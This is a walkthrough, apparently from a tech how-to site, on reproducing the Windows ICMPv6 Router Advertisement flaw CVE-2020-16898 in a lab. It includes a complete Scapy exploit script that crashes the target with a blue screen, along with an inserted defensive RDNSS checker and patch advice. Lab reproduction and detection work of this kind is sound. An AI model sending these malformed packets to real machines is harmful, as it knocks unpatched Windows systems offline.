Shulou (Shulou.com) 05/31 report, updated 2025-04-02. Source: SLTechnology News & Howtos > Network Security
This article shows how to reproduce the CVE-2020-16898 vulnerability. The content is concise and easy to follow, and I hope the detailed walkthrough gives you something useful.
Brief introduction of the vulnerability
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploits it can gain the ability to execute code on the target server or client, and can crash the victim with a blue screen.
To exploit this vulnerability, an attacker would have to send a specially crafted ICMPv6 Router Advertisement packet to a remote Windows computer.
Vulnerability analysis
The vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets that carry option type 25 (the Recursive DNS Server option) with an even value in the length field.
When an even length value is supplied, the Windows TCP/IP stack advances through the network buffer by an amount that is off by 8 bytes. This happens because the stack counts internally in 16-byte increments (the size of one IPv6 address) and does not account for a length value that is not RFC compliant. The mismatch causes the stack to interpret the last 8 bytes of the current option as the beginning of the next option, resulting in a buffer overflow and potential RCE.
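A defender-side check for exactly this shape, added here as an example that is not part of the original article and not vendor code: it walks the ND options of an ICMPv6 Router Advertisement and flags an RDNSS option (type 25) whose length field is even, since RFC 8106 requires len = 1 + 2n for n addresses. The two sample packets are constructed inline; in real traffic the check must run on the reassembled ICMPv6 payload, because the script later in this article sends the advertisement as IPv6 fragments.

```python
import struct

ICMPV6_ROUTER_ADVERT = 134
ND_OPT_RDNSS = 25          # Recursive DNS Server option (RFC 8106)

def parse_nd_options(payload):
    """Walk the ND options that follow the 16-byte Router Advertisement header.
    Option length is in 8-byte units; returns (type, len, truncated) per option."""
    opts, off = [], 16
    while off + 2 <= len(payload):
        otype, olen = payload[off], payload[off + 1]
        if olen == 0:              # RFC 4861: zero length is invalid, stop parsing
            break
        size = olen * 8
        opts.append((otype, olen, off + size > len(payload)))
        off += size
    return opts

def rdnss_findings(payload):
    """Flag RDNSS options whose length cannot be 1 + 2*n (the CVE-2020-16898 shape)."""
    findings = []
    if len(payload) < 16 or payload[0] != ICMPV6_ROUTER_ADVERT:
        return findings
    for otype, olen, truncated in parse_nd_options(payload):
        if otype != ND_OPT_RDNSS:
            continue
        if olen % 2 == 0:
            findings.append(f"RDNSS option with even length {olen}: CVE-2020-16898 pattern")
        elif olen < 3:
            findings.append(f"RDNSS option with length {olen} < 3")
        if truncated:
            findings.append(f"RDNSS option length {olen} runs past the end of the packet")
    return findings

# --- constructed sample packets (not captured traffic) ---
def build_ra(options):
    # ICMPv6 type/code/checksum(0) + hop limit, flags, router lifetime, reachable, retrans
    hdr = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0)
    return hdr + b"".join(options)

def rdnss_option(olen, addrs):
    # type, len, reserved(2), lifetime(4), then one or more 16-byte addresses
    return bytes([ND_OPT_RDNSS, olen, 0, 0]) + struct.pack("!I", 3600) + b"".join(addrs)

GOOD_RA = build_ra([rdnss_option(3, [bytes(16)])])          # len 3 = header + 1 address
BAD_RA = build_ra([rdnss_option(4, [b"\xaa" * 16] * 2)])    # len 4 covers 32 of 40 bytes

if __name__ == "__main__":
    print(rdnss_findings(GOOD_RA))   # []
    print(rdnss_findings(BAD_RA))
```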
Affected versions
Microsoft Windows 10 1709
Microsoft Windows 10 1803
Microsoft Windows 10 1809
Microsoft Windows 10 1903
Microsoft Windows 10 1909
Microsoft Windows 10 2004
Microsoft Windows Server 2019
Environment setup
Attacker machine IP: 192.168.192.1 (Windows 10 1909)
Target machine IP: 192.168.192.128 (Windows 10 1809)
Vulnerability reproduction
Make sure the target machine's network adapter is in NAT mode and that IPv6 is enabled.
Open the Virtual Network Editor and click Change Settings.
Then enable IPv6 and click OK.
Make sure that both machines can ping each other.
Target machine pings the attacker machine
Attacker machine pings the target machine
Check the IPv6 address of the target machine.
Check the IPv6 address of the attacker machine.
Then use a publicly available payload script (CVE-2020-16898.py).
Its content is:

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fd15:4ba5:5a2b:1008:5d26:75a3:1641:ee3"  # change to the IPv6 address (or temporary IPv6 address) of the target machine
v6_src = "fe80::9548:d004:9491:9c34"                # the link-local IPv6 address of the attacker machine

p_test_half = 'A'.encode() * 8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode() * 4

c = ICMPv6NDOptEFA()

# RDNSS option (type 25) with a length field that is not RFC compliant
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
    "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
]

aaa = ICMPv6NDOptRDNSS()
aaa.len = 8

pkt = ICMPv6ND_RA() / aaa / \
      Raw(load='A'.encode() * 16 * 2 + p_test_half + b"\x18\xa0" * 6) / c / e / c / e / c / e / c / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255) / \
              IPv6ExtHdrFragment() / pkt

# split the Router Advertisement into IPv6 fragments and send them
l = fragment6(p_test_frag, 200)
for p in l:
    send(p)
The target address (v6_dst) above must be the target machine's IPv6 address or temporary IPv6 address.
The attacker address (v6_src) must be the attacker machine's link-local IPv6 address.
Once both addresses have been written into the payload, the attack can be carried out.
The attack relies on the Scapy library, which requires a Python environment.
Install Python on the attacker machine (download it from the official website and configure the environment).
Scapy is a Python program that lets users send, sniff, parse and forge network packets. This capability allows you to build tools that can probe, scan, or attack a network.
The install command is: pip install scapy
If it fails, the Python version may be too new; you can choose Python 3.7 instead.
You can see that I have installed this component.
Start Scapy and the following interface appears.
cd to the desktop (the script file is on the desktop).
Then run this command:
python CVE-2020-16898.py
You can see the target machine blue screen.
The experiment is complete.
Vulnerability repair
The proper fix is the Microsoft security update for this CVE (released in October 2020); the following are workarounds for hosts that cannot be patched yet.
Turn on the host firewall.
Turn off the IPv6 service if it is not needed.
Strictly filter external traffic (in particular ICMPv6 Router Advertisements from untrusted sources).
The above is how to reproduce the CVE-2020-16898 vulnerability. Have you learned something new? If you want to learn more skills or expand your knowledge, you are welcome to follow the industry information channel.